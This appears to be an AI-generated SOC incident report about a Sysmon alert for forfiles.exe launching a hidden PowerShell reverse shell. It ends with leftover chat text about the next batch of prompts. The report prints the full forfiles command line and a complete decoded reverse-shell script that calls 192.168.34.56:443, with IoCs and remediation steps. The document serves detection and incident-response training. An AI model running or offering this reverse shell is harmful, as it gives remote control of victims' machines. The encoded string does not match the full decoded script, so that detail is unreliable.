Sysmon Alert Details
Alert ID: SYSMON-INDIRECT-1202-7842 Alert Time: 2024-02-19 10:30:15 EST Severity: HIGH (82/100) Source: Sysmon (Event ID 1 – Process Creation) Rule: “Indirect Command Execution via Forfiles.exe” MITRE ATT&CK: T1202 – Indirect Command Execution
Alert Details:
Event ID: 1 (Process Creation) Time: 10:25 EST Host: ENG-WS-034 (Engineering Workstation) User: rpatel (Raj Patel, Engineer)
Process Tree:
explorer.exe (PID: 2341)
cmd.exe (PID: 4789)
forfiles.exe (PID: 4792)
Command: forfiles /p C:\Windows\System32 /m notepad.exe /c “cmd /c powershell -WindowStyle Hidden -EncodedCommand JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACcAMQA5ADIALgAxADYAOAAuADMANAAuADUANgAnACwANAA0ADMAKQA7AA==”
Detection Logic:
forfiles.exe used to execute command (indirect execution)
Command executes PowerShell with encoded reverse shell
forfiles.exe is a trusted Windows binary (living off the land)
Pattern matches attacker technique to bypass AppLocker
Decoded PowerShell Command:
$client = New-Object System.Net.Sockets.TCPClient(‘192.168.34.56’,443);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data 2>&1 | Out-String );
$sendback2 = $sendback + ‘PS ‘ + (pwd).Path + ‘> ‘;
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);
$stream.Flush()
};
$client.Close()
Additional Context:
forfiles.exe used to indirectly execute PowerShell
C2 IP: 192.168.34.56 (internal)
User rpatel had previously clicked phishing link
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify Sysmon events
Splunk, Sysmon Logs
Confirmed indirect command execution via forfiles
2. Command Decoding
Decode PowerShell
CyberChef
Reverse shell to 192.168.34.56:443
3. Process Investigation
Identify source of command
CrowdStrike
Malicious script downloaded earlier
4. Immediate Action
Terminate reverse shell
CrowdStrike
PowerShell process killed
5. C2 Investigation
Identify 192.168.34.56
CMDB, CrowdStrike
Internal engineering host (already compromised)
6. Host Isolation
Isolate both hosts
CrowdStrike
Both hosts quarantined
Jira Incident Report
Ticket: SOC-2024-100 Summary: T1202 – Indirect Command Execution via Forfiles.exe for Reverse Shell Status: RESOLVED Resolution: MALICIOUS – Reverse Shell Terminated Priority: P2 – MEDIUM Labels: T1202, indirect-command, forfiles, lolbin, sysmon, reverse-shell Components: Endpoint-Security, Defense-Evasion
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Sysmon Event ID 1 (Process Creation).
Alert: “Indirect Command Execution via Forfiles.exe”.
Host: ENG-WS-034 (Engineering Department, user rpatel).
Time: 2024-02-19 10:30 EST.
Technique: MITRE ATT&CK T1202 – Indirect Command Execution.
2. Technical Analysis:
Attack Chain:
09:45 – User clicked phishing link in email
09:46 – PowerShell downloaded and executed initial script
09:47 – Script downloaded Cobalt Strike beacon
09:48 – Beacon injected into svchost.exe
09:50 – Attacker used beacon to launch indirect command
10:25 – forfiles.exe executed with malicious command
10:25 – PowerShell reverse shell to internal C2
10:30 – Sysmon detects
Indirect Execution Technique:
Binary: forfiles.exe (legitimate Windows tool)
Purpose: Normally used to run commands on files
Abuse: /c parameter executes arbitrary command
Why: Bypasses AppLocker (trusted binary)
Command: Launches encoded PowerShell reverse shell
C2 Infrastructure:
Internal C2: 192.168.34.56:443 (ENG-WS-089)
External C2: 185.143.221[.]89 (from engineering host logs)
Chain: ENG-WS-034 -> ENG-WS-089 -> External
Reverse Shell Capabilities:
Interactive PowerShell session
Full command execution
File upload/download
No data exfiltration before termination
3. Investigation Findings:
Timeline:
09:45 – Phishing email opened
09:46-09:48 – Malware installation
10:25 – Indirect command execution
10:30 – Sysmon alert
10:32 – SOC investigates
10:35 – Reverse shell terminated
10:36 – Both hosts isolated
Indicators of Compromise (IoCs):
Process:
– forfiles.exe /p C:\Windows\System32 /m notepad.exe /c “cmd /c powershell -WindowStyle Hidden -EncodedCommand JABjAGwAaQ…
Network:
– Internal C2: 192.168.34.56:443
– External C2: 185.143.221[.]89
Files:
– Initial dropper (SHA256: a1b2c3d4…)
4. Containment Actions:
Immediate Actions:
Terminated reverse shell process.
Isolated ENG-WS-034.
Isolated ENG-WS-089 (C2 host).
Blocked external C2 at firewall.
Malware Removal:
Removed injected code from svchost.exe on both hosts.
Deleted malicious files.
Full scans (clean).
User Remediation:
Password reset for rpatel.
Phishing training assigned.
5. Root Cause Analysis:
Primary Cause: User clicked phishing link.
Contributing Factors:
AppLocker allowed forfiles.exe (legitimate binary).
PowerShell allowed to execute.
No monitoring for LOLBin abuse.
6. Business Impact:
Operational Impact: Two engineering workstations offline for 2 hours.
Data Exposure: None (C2 contained).
7. Remediation & Prevention:
Completed Actions:
Reverse shell terminated.
Malware removed.
Hosts secured.
C2 blocked.
Technical Controls Enhanced:
Created Sysmon rule for forfiles.exe with suspicious command lines.
Enhanced monitoring for LOLBin abuse.
Restricted PowerShell execution policy.
8. Conclusion:
An attacker used forfiles.exe, a legitimate Windows binary, to indirectly execute a PowerShell reverse shell, bypassing application controls. Sysmon detected the anomalous process execution, enabling rapid termination. The reverse shell was active for only 5 minutes before containment.
Closure Rationale: Reverse shell terminated; malware removed; LOLBin monitoring enhanced.
Analyst: [Walter White], SOC Analyst Date: 2024-02-19 11:30 EST
End of Batch 12
Ready for your next batch of prompts whenever you are.
Batch 13: Defense Evasion & Credential Access Incident Reports
Here are the next 5 detailed SOC incident reports.